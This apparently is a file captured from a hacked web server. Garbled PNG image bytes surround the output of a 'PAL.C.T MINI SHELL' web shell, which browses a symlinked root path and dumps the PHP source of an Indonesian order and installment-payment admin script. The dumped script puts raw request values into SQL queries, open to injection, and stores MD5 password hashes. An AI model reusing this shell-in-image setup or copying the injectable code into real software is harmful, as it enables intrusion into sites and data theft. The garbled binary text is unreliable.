�php  IHDRwQ)B�a pHYs  ��sRGB���gAMA�� �a�IDATx��Mk\U��s&uo,�m�D )Xw�+�e?��tw.�o�Wp��;���QHZnw�`gaiJ�9�����̟灙����a�=�nl�[ ʨG��;@ q$��� ��w�@�H��;@ q$��� ��w�@�H��;@ q$��� ��w�@�H��;@ q$��� ��w�@�H��;@ q$��� ��w�@�H��;@ q$��� ��w�@�H��;@ q$��� ��w�@�H��;@ q$�����y H����@�E7j�� 1j+OF����Rg}ܫ�;@�E��a�����~ �j`�u�'o�> �j�-$�_�q?�q�SXzG'��ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/proc/self/root/var/www/html/fl/content/orderan/
upload
files >> /var/www/html/sub/images/sym/root/proc/self/root/var/www/html/fl/content/orderan/aksi_orderan.php

<?php
session_start();
//error_reporting(0);
 if (empty($_SESSION['namauser']) AND empty($_SESSION['passuser'])){
  header('location:../../lockscreen.php');
}
else{
include "../../konfig/koneksi.php";
include "../../konfig/fungsi_thumb.php";
include "../../konfig/library.php";

$module=$_GET['module'];
$act=$_GET['act'];

// Input user
if ($module=='orderan' AND $act=='ok'){
	mysql_query("UPDATE list_orderan SET no_order='$_POST[no_order]', catatan_orderan='$_POST[catatan_orderan]', catatan_cicilan='$_POST[catatan_cicilan]', id_status_lo='2', tanggal_approve='$tgl_sekarang' WHERE id_list_orderan='$_POST[id_list_orderan]'");
	header('location:orderan');

}


elseif($module=='orderan' AND $act=='pembayaran'){
	$id_list_orderan  = $_POST['id_list_orderan'];
	$jumlah_bayar = $_POST['jumlah_bayar'];
	$username = $_POST['username'];
	$password = md5($_POST['password']);
	
	$cek_login = mysql_num_rows(mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'"));
	if($cek_login>0){
		$d=mysql_fetch_array(mysql_query("SELECT * FROM list_orderan WHERE id_list_orderan='$id_list_orderan'"));
		
		for($i=1;$i<=$jumlah_bayar;$i++){
			$d=mysql_fetch_array(mysql_query("SELECT * FROM list_orderan WHERE id_list_orderan='$id_list_orderan'"));

			$cicilan = $d['cicilan'];
			if($d['tunggak']==0){
				$tunggak=0;
			}
			else{
				$tunggak=$d['tunggak']-1;
			}
			
			if($d['sisa']==0){
				$sisa=0;
			}
			else{
				$sisa=$d['sisa']-1;
			}
			
			$lp = mysql_fetch_array(mysql_query("SELECT * FROM list_pembayaran WHERE id_list_orderan='$id_list_orderan' ORDER BY id_list_pembayaran DESC LIMIT 1"));
			$cicilan_ke = $lp['cicilan_ke']+1;
			
			$besar_bayar = $cicilan;
			
			$sql=mysql_query("SELECT MAX(no_invoice) AS no_invoice FROM list_pembayaran");
			$r=mysql_fetch_array($sql);
			$no_invoice=$r['no_invoice'];
			$kode_before = substr($no_invoice,2,4);
			$tahun = date('Y');
			$bulan = date('m');
			$thn = substr($tahun,-2);
			$kode_now = $thn.$bulan;
			if($kode_before==$kode_now){
				$no_urut = (int) substr($no_invoice,6,4);
				$no_urut++;
				$no_invoice_new = 'FL'.$kode_before.sprintf("%04s",$no_urut);
			}
			else{
				$no_invoice_new = 'FL'.$kode_now.sprintf("%04s",1);
			}

			mysql_query("INSERT INTO list_pembayaran (id_list_orderan, no_invoice, tanggal_pembayaran, jam_pembayaran, cicilan_ke, jumlah_bayar) VALUES ('$id_list_orderan', '$no_invoice_new', '$tgl_sekarang', '$jam_sekarang', '$cicilan_ke', '$besar_bayar')");
		
			mysql_query("UPDATE list_orderan SET sisa='$sisa', tunggak='$tunggak' WHERE id_list_orderan='$id_list_orderan'");
		}
			
		if($sisa==0){
			mysql_query("UPDATE list_orderan SET id_status_lo='3' WHERE id_list_orderan='$id_list_orderan'");
			
			$c = mysql_fetch_array(mysql_query("SELECT * FROM list_orderan WHERE id_list_orderan='$id_list_orderan'"));
			
			$d=mysql_fetch_array(mysql_query("SELECT * FROM customer a, staff b WHERE a.id_staff=b.id_staff AND a.id_customer='$c[id_customer]'"));
			
			$setting = mysql_fetch_array(mysql_query("SELECT * FROM setting WHERE id_setting='1'"));
			
			if($c['tenor']==1){
				$komisi_tambahan = $setting['komisi_cash'];
			}
			elseif($c['tenor']==25){
				$komisi_tambahan = $setting['komisi_25'];
			}
			elseif($c['tenor']==50){
				$komisi_tambahan = $setting['komisi_50'];
			}
			
			$komisi = $komisi_tambahan * $c['cicilan'] * $c['tenor'] /100;
			$komisi_sekarang = $d['komisi'] + $komisi;
			
			mysql_query("UPDATE staff SET komisi='$komisi_sekarang' WHERE id_staff='$d[id_staff]'");
			//echo"UPDATE staff SET komisi='$komisi' WHERE id_staff='$d[id_staff]'";
		}
		?>
		 <script type="text/javascript">alert("Pembayaran berhasil");history.go(-1);</script>
		<?php
	}
	else{
		?>
		 <script type="text/javascript">alert("Kata sandi salah");history.go(-1);</script>
		<?php
	}
}

elseif ($module=='orderan' AND $act=='lunas'){
	mysql_query("UPDATE list_orderan SET catatan_orderan='$_POST[catatan_orderan]', catatan_cicilan='$_POST[catatan_cicilan]', id_status_lo='3', tanggal_lunas='$tgl_sekarang' WHERE id_list_orderan='$_POST[id_list_orderan]'");
	header('location:orderan');
}

elseif($module=='orderan' AND $act=='batal'){
	mysql_query("UPDATE list_orderan SET catatan_pembatalan='$_POST[catatan_pembatalan]', id_status_lo='4', tanggal_batal='$tgl_sekarang' WHERE id_list_orderan='$_POST[id_list_orderan]'");
	header('location:orderan');	
}

elseif($module=='orderan' AND $act=='retur'){
	mysql_query("UPDATE list_orderan SET catatan_retur='$_POST[catatan_retur]', id_status_lo='5', tanggal_retur='$tgl_sekarang' WHERE id_list_orderan='$_POST[id_list_orderan]'");
	header('location:orderan');	
}

}	
?>
� y���~�or�5�J�={��E��e�u磝Qk��ᯘG{�?���+�]������ן�?w�M3X^��歌>{�7پ�K�>�o��n�\����j�y��R ���g/�=��f�O��r�o��NV�v��~�Y+��NG�u���Ý����HW��y�w�[eQ�ʨ�S�b��>������>�}G�mx[o[<��{���Ϯ_��qF� ��vMIEND�B`�